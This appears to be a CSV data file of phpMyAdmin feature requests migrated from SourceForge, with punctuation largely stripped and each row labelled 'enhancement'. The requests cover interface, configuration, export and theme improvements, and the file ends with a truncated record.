"24444","6268","Reset order of auto increment column.
Hello, last idea in this week ) .
Would be possible to implement function to RESET ORDER of AUTO INCREMENT column?
re order it ) I mean if you have 1 10..x rows, and you delete row 1,3,4,8 and use RESET AUTO INCREMENT, the new order will be 1 6 ?
...
There is easy way how to evade, just simple drop column, but if you have some foreign key, it will not casscade parent values ...
Thank you, best regards.
Original URL https sourceforge.net p phpmyadmin feature requests 1647 Original author jpalider","enhancement"
"24444","6269","Change value of Number of rows when Show all is checked.
While showing table, when Show all is checked, the Number of rows dropdown still shows 25.
This is a bit confusing.
Changing the value there shows selected numbers of rows, which is fine.
But you cannot select 25, as it is already selected.
Solution might be, combining Show all in the dropdown.
Or show some placeholder when show all is selected in dropdown.
Or not show dropdown at all when show all is selected.
Original URL https sourceforge.net p phpmyadmin feature requests 1566 Original author nisargjhaveri","enhancement"
"24444","6270","Add Column After Before.
The Add Column After radio buttons in tbl structure.php can be folded into the dropdown if you add a BEGIN and or END entry to the dropdown.
IMO an END entry and adding the column BEFORE it would be simpler, but the choice is somewhat arbitrary.
I think PHP and C use BEFORE and END in such code.
Original URL https sourceforge.net p phpmyadmin feature requests 1568 Original author olafvdspek","enhancement"
"24444","6271","Drag and Droppable QueryBuilder.
Hi everyone, I planned to add a new query building format such as build queries using logical operators like AND,OR and use them as graphical operators like drag and droppable...When try to type the query there may be errors in column name, table name.
So, we use drag and droppable labels.
When we drop the label it will automatically generate the query... We are currently working on this... See https github.com Biruntha Drag Drop QueryBuilder Any suggestion???
Original URL https sourceforge.net p phpmyadmin feature requests 1569 Original author biruntha","enhancement"
"24444","6272","phpmyadmin and MariaDB.
Hey, When phpmyadmin is connected to MariaDB, it should totally change the logo to phpMaAdmin.
Original URL https sourceforge.net p phpmyadmin feature requests 1571 Original author murrawhip","enhancement"
"24444","6273","User prefs Diff friendly JSON for config.
Could the config.json file when saving user preferences from the Settings tab) have one setting per line to make it more friendly to diff and vcs tools?
Original URL https sourceforge.net p phpmyadmin feature requests 1572 Original author olafvdspek","enhancement"
"24444","6274","Export non permanent settings to PHP no pmadb).
A way to export the config to PHP format for injection in config.inc.php would be nice.
Original URL https sourceforge.net p phpmyadmin feature requests 1573 Original author olafvdspek","enhancement"
"24444","6275","Support IPv6 browser transformation.
MySQL 5.6.3 added the INET6 functions which make it much easier to store both IPv4 and IPv6 addresses in a single VARBINARY 16) field, which will be 4 bytes long for Pv4, and 16 bytes long for IPv6.
PHPMyAdmin currently has an output transform for Long2ipv4, but that won t work for IPv6.
If you use the suggested VARBINARY, the output transforms don t work on IPv4 addresses either.
There is a straightforward mapping between MySQL s binary format and PHP s net functions, so my request is to implement this so that both IPv4 and IPv6 addresses are supported with the input and output transforms.
Here is a function to transform MySQL s binary format into a string in PHP, named after the same function in MySQL php Convert a MySQL binary v4 4 byte) or v6 16 byte) IP address to a string.
param string ip a binary string containing an IP address, as returned from MySQL s INET6 ATON function return string Empty if not valid.
function inet6 ntop ip) { l = strlen ip); if l == 16 or l == 4) { return inet ntop pack A .
l, ip)); } return ; } The other direction does not require anything special as MySQL s INET6 ATON function understands standard strings with colon format IPv6 and dotted quad IPv4.
Original URL https sourceforge.net p phpmyadmin feature requests 1655 Original author coolbru","enhancement"
"24444","6276","Disable database expansion unclear directive name and explanation.
What is database expansion?
Apparently it s Whether to disable the possibility of database expansion or not.
Why is it a negative option?
IMO it should be Enable ...
Original URL https sourceforge.net p phpmyadmin feature requests 1575 Original author olafvdspek","enhancement"
"24444","6277","4.3) Zeroconf PMA tables support.
Could you add zero configuration PMA tables support?
Only creating some of) the PMA tables in a DB should be enough to enable these features.
No config.inc.php modification should be needed.
It d also be nice if PMA offered the user a way to automatically create those tables.
Original URL https sourceforge.net p phpmyadmin feature requests 1576 https sourceforge.net p phpmyadmin feature requests 1576 Original author olafvdspek","enhancement"
"24444","6278","Add features to console.
This is not a bug its a feature request I like the new console feature in phpmyadmin and wanted to do a feature request.
It would be nice to populate the previous next query when the up down arrow keys are pressed Similar to the linux bash command prompt it cycles through your history of commands Thank you Original URL https sourceforge.net p phpmyadmin feature requests 1577 Original author naveensnayak","enhancement"
"24444","6279","Warn about reserved word only when a column is created.
Does one really need to be reminded of this every time one views the structure page?
Original URL https sourceforge.net p phpmyadmin feature requests 1578 Original author olafvdspek","enhancement"
"24444","6280","Default to primary key when adding relation.
Could you default to the primary key of the foreign table when a foreign table is selected?
Original URL https sourceforge.net p phpmyadmin feature requests 1579 Original author olafvdspek","enhancement"
"24444","6281","Individual Zeroconf PMA tables support.
It seems this is an all or nothing feature.
If even one table like bookmarks) is missing, everything is disabled.
Could individual features be enabled if their tables are present?
Original URL https sourceforge.net p phpmyadmin feature requests 1580 Original author olafvdspek","enhancement"
"24444","6282","Rename the database and table name.
Hi, I planned to add a Renaming facility to the database and table names in the navigation panel.And also Renaming facility to table names in the Structure window using double click and then edit the names...
Original URL https sourceforge.net p phpmyadmin feature requests 1581 Original author biruntha","enhancement"
"24444","6283","SQL formatter.
Hi guys, First time here.
It will be great if this tool has SQL formatter.
Very useful for long character queries.
Something like here http www.dpriver.com pp sqlformat.htm I am ready to develop it if I see some good comments here.
Personally needed it few times.
Cheers.
Original URL https sourceforge.net p phpmyadmin feature requests 1582 Original author neboyus","enhancement"
"24444","6284","Feature Request Import Export.
We all know that phpMyAdmin cannot handle large import export.
I currently use BigDump for large imports.
It would be nice to see phpMyAdmin move over to using Ajax for these processes, similar to the BigDump concept Original URL https sourceforge.net p phpmyadmin feature requests 1583 Original author suomedia","enhancement"
"24444","6285","add functions oriented towards voice commands.
Please consider adding functions oriented towards voice commands.
They would likely be useful as buttons as well.
I ll give you one example of a function I perform without such functionality.
I browse a table then highlight and copy all the column names.
That is very simple to do with a mouse but it would be far more difficult in voice mode.
If there are no records in the table and no browse is possible, that function via voice would be even more difficult.
Original URL https sourceforge.net p phpmyadmin feature requests 1585 Original author magnetsa","enhancement"
"24444","6286","recursive function too deep operator change suggestion.
Fix for 4.0 branch.
class Node { public function hasSiblings ) { .... foreach this >parent >children as child) { if child !== this child >type == Node OBJECT || child >hasChildren false)) ....
The use of !== rather than != prevents a recursion too deep in early versions of PHP5.2.
This fatal error occours at least in PHP 5.2.0 8 etch16 I appreciate this is an old version of PHP however there is little reason not to make this fix within 4.0.10.7 as it s aim is to support 5.2.
Original URL https sourceforge.net p phpmyadmin feature requests 1588 Original author ichristian","enhancement"
"24444","6287","Browse improve display of right aligned data.
See http stackoverflow.com questions 30154417 how to center data in table cells in phpmyadmin Maybe add in Browse > Options a checkbox Center numeric data ?
Original URL https sourceforge.net p phpmyadmin feature requests 1673 Original author lem9","enhancement"
"24444","6288","support early versions of PHP5.2 register shutdown function).
Fix for 4.0 branch.
in PHP callbacks, class function support was added in 5.2.3.
Prior to this version, array class , function ) was required.
Due to 4.0 s attempt to support 5.2, this harmless change could be made to libraries OutputBuffering.class.php, function start ).
Rather than register shutdown function PMA OutputBuffering stop ); instead register shutdown function array PMA OutputBuffering , stop )); Original URL https sourceforge.net p phpmyadmin feature requests 1589 Original author ichristian","enhancement"
"24444","6289","Shortcut link to search page.
<b>Request< b> I would like to see additional icon in table list near Structure icon) with link to Search in the table.
<b>Use case< b> quite often I need to search for records in table.
So I press on table name which brings me to Show view.
Then I press on Search and then finally I can enter search criteria and filter result.
The solution with shortcut link would save me from 1 click, but more importantly, would save me from loading page with query to DB.
Original URL https sourceforge.net p phpmyadmin feature requests 1591 Original author aurelijusr","enhancement"
"24444","6290","REQUEST.
I see code like if isset REQUEST[ create pmadb ])) { in pMA and I m not sure this is a good idea.
By default REQUEST contains GET, POST and COOKIE.
If for whatever reason COOKIE has create pmadb you get weird behaviour.
And if the user has configured REQUEST to not include GET or POST you probably run into troubles as well.
Original URL https sourceforge.net p phpmyadmin feature requests 1592 Original author olafvdspek","enhancement"
"24444","6291","replace nonsense error message Cannot log in to the MySQL server .
Replace nonsense error message Cannot log in to the MySQL server when login fails with something helpful including the reason for the failure.
Never use error messages which don t tell the reason for the error, please!
Original URL https sourceforge.net p phpmyadmin feature requests 1593 Original author krichter722","enhancement"
"24444","6292","More plain English configuration options for icon link destinations.
I believe this was initially proposed by Marc.
Regarding ` cfg[ NavigationTreeDefaultTabTable ]` Currently, there are 5 possible values for this configuration variable tbl structure.php = fields list tbl sql.php = SQL form tbl select.php = search page tbl change.php = insert row page sql.php = browse page By the way, using script names as values for such variables has always bothered me.
I would prefer more neutral strings like search , structure and so on.
We should probably do the same with ` cfg[ DefaultTabServer ] = index.php ;` index.php = the welcome page server databases.php = list of databases server status.php = runtime information server variables.php = MySQL server variables server privileges.php = user management ` cfg[ DefaultTabDatabase ] = db structure.php ;` db structure.php = tables list db sql.php = SQL form db search.php = search query db operations.php = operations on database ` cfg[ DefaultTabTable ] = sql.php ;` tbl structure.php = fields list tbl sql.php = SQL form tbl select.php = search page tbl change.php = insert row page sql.php = browse page Original URL https sourceforge.net p phpmyadmin feature requests 1594 Original author ibennetch","enhancement"
"24444","6293","Make Options > Relational configurable.
<b>Request < b> Add GUI setting to make Relational display column the default view mode <b>Description < b> In Browse view, Options > Relational display column is a fantastic function for interacting with tables based on relations.
We love this feature so much, in fact, that we would like a setting in Settings > Main panel > Browse mode to make this display option the default.
Is this possible?
Either for all users on as a user level setting would be great.
Thanks!
Original URL https sourceforge.net p phpmyadmin feature requests 1596 Original author strophy Attachment http sourceforge.net p phpmyadmin feature requests 1596 attachment relational default.png","enhancement"
"24444","6294","cfg[ NavigationTreeDefaultTabTable ] documentation has 2 entries.
In the documentation for the configuration of the Navigation panel setup, there are 2 entries for cfg[ NavigationTreeDefaultTabTable ], the second one with null as defaut value seems to be incorrect.
Original URL https sourceforge.net p phpmyadmin feature requests 1598 Original author pbulat","enhancement"
"24444","6295","UNIQUE PRIMARY key index for a partitioned table.
This is just a feature request.
If you want to create edit a UNIQUE PRIMARY key index for a partitioned table, all columns have to be included.
Otherwise a MySQL error is thrown.
Maybe this can be handled already in PMA as test before executing the statement.
Original URL https sourceforge.net p phpmyadmin feature requests 1599 Original author schattenfell","enhancement"
"24444","6296","Clarify the Inline link.
There s a button named Inline .
What does it do?
Ah, it s to Edit something inline.
Perhaps Edit would be a better name?
The other button could then be named Edit in separate window or something.
Original URL https sourceforge.net p phpmyadmin feature requests 1600 Original author olafvdspek","enhancement"
"24444","6297","Use GET only for read only operations.
Currently we perform some operations by GET and some by POST requests.
We should change this to use GET only for read only operations, while anything what performs changes should be done by POST.
This way we can remove CSRF token from URLs and pass it only in forms, making URLs nicer.
Per RFC 7231, the POST method should be used for any context in which a request is non idempotent that is, it causes a change in server state each time it is performed, such as submitting a comment to a blog post or voting in an online poll.
GET is defined to be nullipotent, with no side effects in contrast to no side effects on second or future requests as with idempotent operations).
Original URL https sourceforge.net p phpmyadmin feature requests 1684 Original author nijel","enhancement"
"24444","6298","mariadb processlist.
it would be nice to support mariadb processlist it has progress column thanks Original URL https sourceforge.net p phpmyadmin feature requests 1685 Original author freeman3","enhancement"
"24444","6299","autocreate phpmyadmin tables.
it would be nice to specityonly pma database in config and then the tables would be created automatically no table set config = auto create Original URL https sourceforge.net p phpmyadmin feature requests 1601 Original author freeman3","enhancement"
"24444","6300","Warn about Any user potential problem.
I realized today why I have spent hours of my life debugging the same error mysql u cohtaxion p test ERROR 1045 28000) Accxc3xa8s refus pour l utilisateur cohtaxion localhost m ot de passe OUI) In English Access refused for user [...] password YES) https dev.mysql.com doc refman 5.6 en problems connecting.html explains If you cannot figure out why you get Access denied, remove from the user table all rows that have Host values containing wildcards rows that contain or characters).
A very common error is to insert a new row with Host= and User= some user , thinking that this enables you to specify localhost to connect from the same machine.
The reason that this does not work is that the default privileges include a row with Host= localhost and User= .
Because that row has a Host value localhost that is more specific than , it is used in preference to the new row when connecting from localhost!
The correct procedure is to insert a second row with Host= localhost and User= some user , or to delete the row with Host= localhost and User= .
After deleting the row, remember to issue a FLUSH PRIVILEGES statement to reload the grant tables.
See also Section 6.2.4, xe2x80x9cAccess Control, Stage 1 Connection Verificationxe2x80x9d.
In other words, for MySQL users are different from identities.
Since many most?)
MySQL installs will come by default with low privileged USAGE) identities on Host , trying to create user foo for Host will make foo unable to connect.
In other words, if you choose Host so that you get the least connection problems, you trigger a connection problem.
This is obviously a major usability bug in MySQL, but it doesn t mean phpMyAdmin can t help.
In fact, looking at the Users tab, the identities listed are presented as users.
The page is titled Users overview , and at the bottom, the user is offered to Add user , or to Remove selected users .
This is standard terminology, but prevents users from realizing that a user is not what they think it is for MySQL.
It may not be needed to change terminology everywhere, but I would recommend To change Users overview to Identities overview .
s Add user Add identity s Remove selected users Remove selected identities Possibly rename the tab from Users to Identities , but that is slightly longer.
This issue was previously reported in http sourceforge.net p phpmyadmin bugs 4273 Marc Delisle indicated there that phpMyAdmin warns about this problem since version 4.1.
I did notice this warning in my phpMyAdmin 4.1.14.
I am not saying there was none though it s a fresh install, and there were other warnings which I was ignoring.
I am sure, however, that I was never asked to confirm when I added the user.
Ideally , phpMyAdmin would detect if there is a possible overlap between identities and require a confirmation in such cases.
Just to clarify the reason why this bug has cost me hours is that I am not a system administrator.
Months go between every time I hit this issue, and I have forgotten the next time.
I suspect this is not a unique case for phpMyAdmin users.
Original URL https sourceforge.net p phpmyadmin feature requests 1686 Original author chealer","enhancement"
"24444","6301","select structure or structure data for each table when exporting entire database.
For GSoC 2015) I ask, if possible, when I export an entire database, select for each table to export only the structure or structure and data.
usually I happen to copy an entire structure when I start a new project, but data from some tables log, references, who is online, and so on) do not interest me, and increase the size of the export exaggerated!
thank you!
Original URL https sourceforge.net p phpmyadmin feature requests 1603 Original author fvsoftware","enhancement"
"24444","6302","Show PHP version.
The home page includes DB server client info, web server info and PHP extension, but it doesn t include the PHP version.. How come?
Original URL https sourceforge.net p phpmyadmin feature requests 1604 Original author olafvdspek","enhancement"
"24444","6303","After database creation, go to database structure page.
After creating a new database, we should go to that database structure page.
See [4752] https sourceforge.net p phpmyadmin bugs 4752 ) and http wiki.phpmyadmin.net pma 2015 02 Meeting IRC Log Original URL https sourceforge.net p phpmyadmin feature requests 1605 Original author ibennetch","enhancement"
"24444","6304","processlist filter.
i would be need nice to add filters to process list like hide sleeping threads thanks Original URL https sourceforge.net p phpmyadmin feature requests 1606 Original author freeman3","enhancement"
"24444","6305","Central columns allowing setting SIGNED UNSIGNED attribute for integer types.
Hi.
While I keep most of my integer columns with UNSIGNED attribute, it would be nice to introduce this in central columns.
Thank you for help Original URL https sourceforge.net p phpmyadmin feature requests 1608 Original author peku33","enhancement"
"24444","6306","Additional page locking.
When making changes to a page, we lock the page so that the user is prompted before navigating away and losing pages.
This feature is established and works as expected.
There are several pages where the lock behavior does not occur and I feel it should Structure tab both Table structure and Relation view) SQL tab Search tab Query tab Original URL https sourceforge.net p phpmyadmin feature requests 1609 Original author ibennetch","enhancement"
"24444","6307","phpmyadmin and php5 mysqlnd dependency.
On Linux, is it possibile to add php5 mysqlnd as dependency for package phpmyadmin?
Original URL https sourceforge.net p phpmyadmin feature requests 1610 Original author eleftrik","enhancement"
"24444","6308","Feasture request test an SQL query without executing it.
I usually test my SQL queries in phpmyadmin before I use them to see if they will execute or produce an error, because I have forgotten something the devil usually hide it ugly face in the details when it comes to programming) Therefore I would like to request that a small button saying TEST SQL to be added in the SQL section of phpmyadmin where it is possible to test an SQL query without executing it the test should look and fell exactly as if the GO button was clicked except that the sql query shouldn t be executed for real.
Is this a feature you would consider to add ?
Original URL https sourceforge.net p phpmyadmin feature requests 1611 Original author h1972dk","enhancement"
"24444","6309","Central columns action on multiple columns.
In the list of central columns for a database, add a checkbox next to each column name, and under the list, a Check all checkbox and a With selected to Edit or Delete multiple columns in this list.
Original URL https sourceforge.net p phpmyadmin feature requests 1613 Original author lem9","enhancement"
"24444","6310","Access to Add columns text box and Go button when creating table.
When creating a table with a large number of columns in the Structure window, the Structure window allows 11 columns to be created without having to scroll.
The window begins scrolling automatically after 11 columns.
However, after adding a 12th and subsequent columns, the Add columns text box and Go button at the top of the window are not visible.
With each subsequent new column added if adding 1 column at a time), the user has to scroll back to the top of the Structure window to click the Go button to add 1 or more new columns.
It would be immensely helpful user friendly and time saving) if the area containing the Table name, Add columns text box and Go button scrolled within the window.
Original URL https sourceforge.net p phpmyadmin feature requests 1614 Original author richarddunnebsc","enhancement"
"24444","6311","Export progress bar.
I would be really nice to have a dialog box showing export progress in real time either in terms of percentage and maybe having some more detailed information like which step table it is processing.
Also, if we can break it down into phases then showing which phase it has completed and which it is currently on.
Original URL https sourceforge.net p phpmyadmin feature requests 1616 Original author chirayu45","enhancement"
"24444","6312","Move to Github move away from SF.
AFAIK the code is already at Github and the issue trackers at github are nicer than the SF ones..
Original URL https sourceforge.net p phpmyadmin feature requests 1618 Original author olafvdspek","enhancement"
"24444","6313","Show databases as list instead of as dropdown when no database is selected.
Show databases as list instead of as dropdown when no database is selected and the legacy behavior was selected.
https sourceforge.net p phpmyadmin feature requests 1574 Original URL https sourceforge.net p phpmyadmin feature requests 1619 Original author olafvdspek","enhancement"
"24444","6314","Support MySQL 5.7 syntax for password change.
According to http dev.mysql.com doc refman 5.7 en set password.html the preferred syntax for changing password is now ALTER USER.
Should be implemented when PMA MYSQL INT VERSION >= 50706, but watch out for MariaDB version numbers being higher.
Original URL https sourceforge.net p phpmyadmin feature requests 1620 Original author lem9","enhancement"
"24444","6315","Add support for xz compression.
The xz compression works way better than bzip2 and gzip, so it would be great if phpMyAdmin supports it for both compressing SQL dumps and for decompressing them.
The problem is that there is currently no native support in PHP, only third party module https github.com payden php xz Original URL https sourceforge.net p phpmyadmin feature requests 1621 Original author nijel","enhancement"
"24444","6316","Facilitate multi column drop.
In the structure window each column has a drop delete option, however, there is no facility that I can see) allowing the user to select multiple columns and drop them simultaneously.
While I m not against writing a delete query, being able to drop multiple columns at the same time in the structure window would obviously be quicker.
Original URL https sourceforge.net p phpmyadmin feature requests 1623 Original author richarddunnebsc","enhancement"
"24444","6317","Facilitate drag and drop of columns between tables.
I ran into a problem creating a table, exceeding the 64 index limit InnoDb).
So I decided to create multiple tables.
The structure window facilitates the re organisation of columns using drag and drop which is really convenient.
It would be as convenient if users were able to move columns from one table to another by the same means, without having to individually drop columns and then re enter them individually into another table.
Original URL https sourceforge.net p phpmyadmin feature requests 1624 Original author richarddunnebsc","enhancement"
"24444","6318","Toggle autocomplete of table and column names.
Hi all!
At this moment I have a slow connection to my remote database servers ping to hosts is about 600ms).
And when I type an SQL query on the SQL tab I get a lot of frozen autocomplete queries I see them in the Fiddler).
And when I press the button to execute query I get stopped responding UI showing popup executing... and for something waiting for a long time waiting for the second Jesus coming I think) and finally fails with JS error.
I temporarily solved this placing the die ) operator at first line in db sql autocomplete.php but hope to see a more graceful solution.
Thanks.
Original URL https sourceforge.net p phpmyadmin feature requests 1625 Original author speller1","enhancement"
"24444","6319","Display edit index name.
I created a table of 30 columns and when I clicked Save I got 1061 Duplicate key named xxxxxx .
I am assuming that the duplication is on the next column, but I can t be sure.
The only way I can fix this is by re entering a column name and re selecting the index to rename it, assuming I have selected the offending column.
It would be helpful if after naming an index, the index name was displayed beside the index in the index drop down list, plus a way of editing renaming the index name.
Original URL https sourceforge.net p phpmyadmin feature requests 1626 Original author richarddunnebsc","enhancement"
"24444","6320","Allow php variables in queries.
phpMyAdmin is a program that allows users to manage their MySQL database s).
So why exactly is it called phpMyAdmin and not MySQLAdmin or something more relatable?
When interfacing with a MySQL database using PHP, PHP queries mysqli query) often require the use of PHP variables.
The queries executed in the SQL window of phpMyAdmin are MySQL only, they do not contain any PHP variables.
One is not a reflection of the other.
There is no way of testing a mysqli query that contains PHP variables in phpMyAdmin.
You could be forgiven for thinking it was possible given its name!
For those learning PHP and MySQL, phpMyAdmin would be a great learning testing tool were it possible to integrate PHP variables into MySQL queries.
No harm in asking.
Original URL https sourceforge.net p phpmyadmin feature requests 1627 Original author richarddunnebsc","enhancement"
"24444","6321","need display binary as hex string option in Settings UI.
I m on a shared server, so my ability to configure phpMyAdmin is limited to what s exposed in the Settings UI.
My Web host recently upgraded from phpMyAdmin 4.2.10 to 4.3.10, and with that a critical setting has been removed from the UI the ability to display blob data as text rather than hex.
In Drupal 7 and higher, ALL data is stored as blobs, but it s just serialized data.
When I could change the display from hex to string, I could see what was being stored.
Now it s all gibberish, and I can t check the values of any field.
If I wasn t on a shared server, I could add this line to the phpMyAdmin configuration file but I m not so I can t) Show BLOB data as a string not hex.
cfg[ DisplayBinaryAsHex ] = false; Please add this option back into the Settings UI so that people using Drupal 7 and higher on a shared server aren t completely screwed.
There is a lot of sobbing about this on the internet.
I m trying to develop a module for Drupal 7, and not being able to look at the data with phpMyAdmin makes things much harder.
Original URL https sourceforge.net p phpmyadmin feature requests 1628 Original author permutations","enhancement"
"24444","6322","the default should either be one or two underscores.. From what I can tell, the default configuration database uses double underscores.
But the configuration file that comes with fedora at least) indicates that the defaults all use a single underscore.
This makes debugging difficult.
I am going to have to define all of the databases manually, only because I have to exclude it from my debugging process.
It makes no difference to me.
But there whole concept of default setting is that there is one and only one possible value that something will automatically take.
Thank you for your amazing tool.
Its so good its addictive.
Regards, Fred Trotter Original URL https sourceforge.net p phpmyadmin feature requests 1630 Original author synseer","enhancement"
"24444","6323","Small animation to loading messeges.
I would like to replace the default Loading... or please wait...) message with an animated circular loader on a dark shade.
Original URL https sourceforge.net p phpmyadmin feature requests 1631 Original author getmebasilkpaul Attachment http sourceforge.net p phpmyadmin feature requests 1631 attachment phpmyadmin.jpg","enhancement"
"24444","6324","Importing and exporting pMA meta data.
As far as I know there s no way to import and export pMA meta data from pMA storage) of a single DB, which IMO would be very useful.
Could this be added?
Original URL https sourceforge.net p phpmyadmin feature requests 1632 Original author olafvdspek","enhancement"
"24444","6325","User Preferences reset should clear the value in pma userconfig.
Say a user sets a configuration value through the User Preferences feature the Settings tab), then decides to set a different value in config.inc.php.
I expect that when they go to the Settings tab and press the green reset to default icon, that this setting is completely removed from the pma userconfig database so that the value is used from from config.inc.php or config.default.php if not explicitly set by the user); however what seems to occur is that the official default value is forced in to the database.
The end result is that the user could have user preferences showing they ve reset the default, but still overriding config.inc.php .
Original URL https sourceforge.net p phpmyadmin feature requests 1633 Original author ibennetch","enhancement"
"24444","6326","Don t group tables in tree if the result has only one group.
Just created the phpmyadmin DB.
The nav tree has a pma group and a New node and nothing else) that contains all tables.
I don t think having a group makes sense in this case.
Original URL https sourceforge.net p phpmyadmin feature requests 1634 Original author olafvdspek","enhancement"
"24444","6327","Have ZeroConf create phpmyadmin DB if possible.
If possible, pMA ZeroConf should create the phpmyadmin DB instead of creating the tables in the current DB.
Original URL https sourceforge.net p phpmyadmin feature requests 1635 Original author olafvdspek","enhancement"
"24444","6328","Show row in vertical mode.
Very wide tables requiring horizontal scrolling aren t convenient to browse.
Could a Show Row command be added next to Edit etc) that shows one row in vertical mode like MySQL \G command)?
Original URL https sourceforge.net p phpmyadmin feature requests 1636 Original author olafvdspek","enhancement"
"24444","6329","Select from previously used table or column names.
When using long similar table and or column names, it would be useful if previously used table or column names were available to select from.
If I have already entered one flew over the cuckoos nest, I wouldn t have to retype one flew over the in order to enter one flew over the rainbow.
It would speed up table creation.
Original URL https sourceforge.net p phpmyadmin feature requests 1637 Original author richarddunnebsc","enhancement"
"24444","6330","Add grouping to stored procedures in the navigation tree.
I have a bunch of stored procedures for each table and would like to group them by name prefix like tables and views.
Original URL https sourceforge.net p phpmyadmin feature requests 1639 Original author fdracar","enhancement"
"24444","6331","Icons of keys, FK cell value, translation.. Hello phpMyAdmin team.
I am working with phpMyAdmin for long time.I would like share some of my things which i have on mind.
It would be possible to show icon of FK key in structure table and both icon FK key , PK key ) in records table in title of table for example gold PK and shadow FK) ?
I think it can helps.
Next thing is, would be possible to see in FK key cell value of FK key not like a title, but for example between the brackets as italic or different style simple in the table ?
After using my own language, there are lot of not translated words between translated, it s possible to repair it in some way and join it into new phpMyAdmin release?
Thanks a lot.
Original URL https sourceforge.net p phpmyadmin feature requests 1640 Original author jpalider","enhancement"
"24444","6332","Database images show images preview.. Hello Dear phpMyAdmin team.
I have little idea about images in table, I dont know if it s possible now, but what about show images in php table ?
I mean if someone save name of file into database, it would be also possible to add relative path to the image and show him direct in db.
For example I will add new record with name picture.png.
In the structure of table I can specify the path in form of IM[ BASE ] images icons FK[ dbname1.dbtable1.dbid1 dbname2.dbtableid2.dbid2.valueYear ] databaseVALUE.
This is just example and I think it can be interesting, because many time I or everyone else want to see how this picture looks and I must to search for it for long time throught many tables to found the path.
I think it will be not easy, but it can save time of many users,admin or developers for this, who will save file name of picture or file into db.
Thanks a lot and I hope my post isn t just wasting of your time.
Original URL https sourceforge.net p phpmyadmin feature requests 1641 Original author jpalider","enhancement"
"24444","6333","Problem when adding new row in new table.
Hello.
When I add one row more when I am creating new table, the connection cell appears and I must to fill him to continue ... it s global bug or some error on my side ?
...
Original URL https sourceforge.net p phpmyadmin feature requests 1642 Original author jpalider Attachment http sourceforge.net p phpmyadmin feature requests 1642 attachment V C3 BDst C5 99i C5 BEek2.JPG","enhancement"
"24444","6334","No SQL query for loading data.
Hello.
I think it s a little thing, but when I press button ) to show new window in GIS data visualization, it show me red warning, that the SQL query wasn t set ... And what about to check box to use OpenStreetMap everytime and select some id as SELECTED ?
...
I am using it for map and it s annoying to check it everytime again and again ..
Thanks a lot .
Original URL https sourceforge.net p phpmyadmin feature requests 1643 Original author jpalider","enhancement"
"24444","6335","Metro theme design update.
Hello.
Would be possible to make little changes in Metro theme ?
1) Please repair background color to white of legend in field fieldset class= caution ) .
2) Icons in main panel are little bit confusing.
First icon showed as HOME , it s okay.
Second icon showed as LEAVE ?
The title and action is local DOC, not okay.
Third icon showed as HELP ?
and the target is web DOC, maybe okay,but minimaly change EN title to WEB DOC.
PS for DOC is everywhere used icon INFO .
Fourth icon showed as INFO ?
Target is refresh, please change icon.
And maybe change the icon of COLLAPSE ALL , it s ugly and makes user think, what it means.
Changes highlighted in attachment.
Thank you ) .
Original URL https sourceforge.net p phpmyadmin feature requests 1646 Original author jpalider Attachment http sourceforge.net p phpmyadmin feature requests 1646 attachment metro theme.JPG","enhancement"
"24444","6336","Metro theme table background style.
Hello.
Would be possible to change metro <i>result row< i> and <i>settings row< i> style to tr nth child odd){background color f8f8f8;} In result table it works sometime, setting table is totaly white and structure is broken with this background style.
Thank you.
Original URL https sourceforge.net p phpmyadmin feature requests 1648 Original author jpalider Attachment http sourceforge.net p phpmyadmin feature requests 1648 attachment structuretable current.JPG Attachment http sourceforge.net p phpmyadmin feature requests 1648 attachment resulttable current.JPG Attachment http sourceforge.net p phpmyadmin feature requests 1648 attachment settingbackground new.JPG","enhancement"
"24444","6337","Metro Navi tree icons.
Hello.
I have some idea about the navi tree design in Metro theme.
I like the Metro style, but there are few thing which can be did better in design way.
I would like talk about navi tree.
Due to greyscale and simmilar type of icons, the tree is little bit chaotic, especialy when you use grouping of tables.
Will be possible to make few changes in future to make it little bit clearer ?
Just for example in attachment made from icons from metro theme).
Main mission of icons is better orientation on page, but in Metro theme there are many, which make the orientation worse, especialy icons of tables,grouped tables, key, field ?
Thank you, I hope my opinion helps ) .
Have a nice day.
Original URL https sourceforge.net p phpmyadmin feature requests 1649 Original author jpalider Attachment http sourceforge.net p phpmyadmin feature requests 1649 attachment navitree2.jpg Attachment http sourceforge.net p phpmyadmin feature requests 1649 attachment navitree1.jpg","enhancement"
"24444","6338","Support a default page in designer.
Currently the designer loads the first page when you navigate into the designer and the user have no control over it.
I suggest to load a page by default if it has the same name as the database something similar to what we do for bookmarks) and fallback to the current behavior if no such exists.
Original URL https sourceforge.net p phpmyadmin feature requests 1650 Original author madhuracj","enhancement"
"24444","6339","Allow copying mutiple rows.
It would be useful to be able to copy multiple rows in table browse page.
Original URL https sourceforge.net p phpmyadmin feature requests 1651 Original author madhuracj","enhancement"
"24444","6340","Auto Completion for SQL statements.
I was using PMA writing long JOIN statements when I realised it d be really cool to have autocompletion in PMA where ever I write SQL statements.
Initial goal should be to implement auto completion for standard keywords, but then later also based on selected database > {i.e take into account the tables, and their structures present in the database} to provide better suggestion for auto completion.
It d be really helpful in case of huge JOIN statements...
I m willing to write this, if you like the idea...
I already miss contributing to PMA ) Original URL https sourceforge.net p phpmyadmin feature requests 1652 Original author mebjas","enhancement"
"24444","6341","New data validation feature and datetime type.
On a datetime column, a valid datetime is 2015 04 09 ; MySQL automatically converts this to 2015 04 09 00 00 00 .
The new jQuery data validation see https github.com phpmyadmin phpmyadmin pull 1622) prevents entering the shortened form.
We probably should allow insert when using the shortened form here.
Original URL https sourceforge.net p phpmyadmin feature requests 1653 Original author ibennetch","enhancement"
"24444","6342","After login session expires, restore navigation pane.
After the login session expires due to exceeding LoginCookieValidity, we can log back in and the main pane returns to what page we were left on.
However, the navigation pane stays collapsed.
I would like if the navigation pane could also restore to the expanded state it was in.
Original URL https sourceforge.net p phpmyadmin feature requests 1654 Original author ibennetch","enhancement"
"24444","6343","Single line vs multi line edit fields.
The field for varchar 60) is single line and quite wide, the field for varchar 200) is multi line and not so wide.
Shouldn t both be same width?
Original URL https sourceforge.net p phpmyadmin feature requests 1657 Original author olafvdspek","enhancement"
"24444","6344","Better Performance.
pMA4 feels quite slow, especially compared to pMA3.
Could performance be improved?
Original URL https sourceforge.net p phpmyadmin feature requests 1658 Original author olafvdspek","enhancement"
"24444","6345","Display the CREATE TABLE statement like HeidiSQL.
I used HeidiSQL before, but it don t support Linux, so I try PMA, I found PMA is powerful.
But I think it s more convenient for users if there is a quick way to view the CREATE TABLE and DATABASE statement like HeidiSQL.
Original URL https sourceforge.net p phpmyadmin feature requests 1659 Original author cslistener","enhancement"
"24444","6346","Trying to get an export only code.
I am trying to automate export.
